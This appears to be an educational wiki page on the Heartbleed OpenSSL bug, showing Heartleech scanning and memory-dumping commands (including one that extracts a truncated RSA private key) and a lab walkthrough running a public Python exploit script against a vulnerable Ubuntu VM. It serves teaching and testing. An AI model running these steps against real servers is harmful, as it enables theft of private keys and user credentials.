Heartbleed Attacks
Testing tools
There are multiple ways to assess if a website is vulnerable to the Heartbleed security risk.
Attack 1
The result of a Heartbleed Bug is shown in the following picture.
Interpretation
The left hand column represents the HEAP address, the column in the middle contains the fetched data in a hexadecimal representation. The right hand column is the actual readable output. Here, user credentials, banking information or even the encryption method may be stated.
(Reminder: the attacked server must implement an OpenSSL version between 1.0.1 and 1.0.1.f)
Heartleech by Robert David Graham
The project can be found under following URL: "https://github.com/robertdavidgraham/heartleech" The first step to test a system for the vulnerabilty to the Heartbleed Bug with the Heartleech testing tool is to install Heartleech on Kali Linux with the command:[1]
$ apt−get install heartleech usage: heartleech <hostname> −f<filename> [−p<port >] ... <filename> is a DNS name or IP address of the target <filename is where the heartbleed information is stored <port> is the port number, defaulting to 433
After successful installation, the option –scan examines a system for its vulnerability. [1]
$ heartleech www.google.com −p 443 −−scan −−− heartleech/1.0.0h −−− https://github.com/robertdavidgraham/heartleech PCRE library : 8.39 2016−06−2014 www.google.com:443: SAFE
To showcase a vulnerable system, a Virtual Machine with the vulnerable Ubuntu 12.04 with an Apache web server was used and the Heartleech identified the system as VULNERABLE. [1]
$ heartleech −−scan 192.168.40.145 192.168.40.145:443: VULNERABLE
Conceding that Heartleech command is used without any other parameter, it will read data from the memory until the program was to be aborted. [1]
$ heartleech 192.168.40.145 1896737 byted downloaded (101.215 −mbps)
To find private information the –autopawn and –threads options can be used. In this case Heartleech found a RSA Private Key in the vulnerable memory. [1]
$ heartleech 192.168.40.145 −−autopwn −−threads 20 −−− heartleech / 1.0.0h −−− https://github.com/robertdavidgraham/heartleech PCRE library : 8.39 2016−06−2014 0 byted downloaded (0.000 −mbps ) −−−−−BEGIN RSA PRIVATE KEY−−−−− MIIEowIBAAKCAQEAwgrg7H+rjMb0FEkf /d3VeZe68NwMF+maKHc ... −−−−−END RSA PRIVATE KEY−−−−−
Attack 2
Furthermore, the Heartbleed bug can be demonstrated using a freely available exploit script found on Github.
First, a server ISO image is to be downloaded from here: https://old-releases.ubuntu.com/releases/12.04.4/. This version of Ubuntu features the vulnerable OpenSSl version 1.0.1 from March 2012.
After creating a virtual machine from this image in Oracle VirtualBox Manager, it is necessary to change the Network Adapter setting of Adapter 1 to Bridged Adapter as can be seen in the image below.
Next, edit the /etc/apt/sources.list file so update and upgrade operations will be redirected to legacy Ubuntu servers:
Execute "sudo apt-get update" to retrieve package information from the Ubuntu legacy servers and then install Apache by executing "sudo apt-get install apache2":
Enable the SSL module and the default webpage bundled with Apache2 by executing „sudo a2enmod ssl“ and „sudo a2ensite default-ssl“:
Restart the web server and determine its IP address:
Download a Kali Linux image from here: https://www.kali.org/get-kali/#kali-virtual-machines to create a Client virtual machine and choose the VirtualBox option.
After setting the Client up, change the Network Adapter settings of Adapter 1 to Bridged Adapter as shown in the image below.
Open a browser on the Client machine and verify the web server's availability by accessing "https://" followed by its known IP address. You will be shown a warning about the web server's self-signed certificate and can take a look at it by clicking on "View Certificate":
Execute "openssl s_client -connect " followed by the web server's IP address to diagnose the web server:
Save a Heartbleed exploit script (https://gist.githubusercontent.com/sh1n0b1/10100394/raw/634aef12c0dcf06921986e22ad9b3f955b33697f/ssltest.py) available on Github (https://gist.github.com/sh1n0b1/10100394) locally via clicking the "Raw" button and choosing the "Save Page As..." option as shown below.
Execute the exploit script via "python2.7 {location of the script} {web server's IP address}":
While the above screenshots do not reveal sensitive information, a malicious entity exploiting a web server which implements session management is highly likely to reveal cryptographic information and/or login credentials eventually [2].
References
- ↑ 1.0 1.1 1.2 1.3 1.4 K. Gebeshuber, E. Teiniker, and W. Zugaj, Real Life Exploitation, p. 485–488. Rheinwerk, 2019.
- ↑ Ghafoor, Imran and Jattala, Imran and Durrani, Shakeel and Muhammad Tahir, Ch. Analysis of OpenSSL Heartbleed vulnerability for embedded systems in 17th IEEE International Multi Topic Conference 2014, p. 314-319. 2014.














